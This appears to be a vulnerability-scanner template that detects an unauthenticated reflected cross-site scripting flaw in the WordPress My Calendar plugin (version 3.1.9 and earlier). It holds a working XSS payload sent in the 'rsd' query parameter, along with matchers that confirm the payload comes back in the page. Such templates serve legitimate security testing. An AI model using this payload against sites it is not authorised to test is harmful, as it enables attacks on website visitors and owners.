id: my-calender-xss

info:
  name: My Calendar <= 3.1.9 - Unauthenticated Cross-Site Scripting (XSS)
  author: dhiyaneshDk
  severity: medium
  reference: https://wpscan.com/vulnerability/9267
  tags: wordpress

requests:
  - method: GET
    path:
      - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm(%2F{{randstr}}%2F)%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<svg/onload=confirm(/{{randstr}}/)>"
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200